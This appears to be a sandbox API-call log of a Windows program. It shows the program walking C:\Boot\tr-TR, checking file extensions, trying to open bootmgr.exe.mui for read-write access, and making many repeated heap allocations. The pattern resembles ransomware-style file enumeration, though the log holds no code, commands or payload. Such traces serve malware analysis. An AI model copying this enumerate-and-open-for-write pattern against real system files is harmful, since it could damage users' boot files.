0x2a05da8 [0184.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.361] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.362] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.362] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0184.362] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.363] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.363] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.364] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.364] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 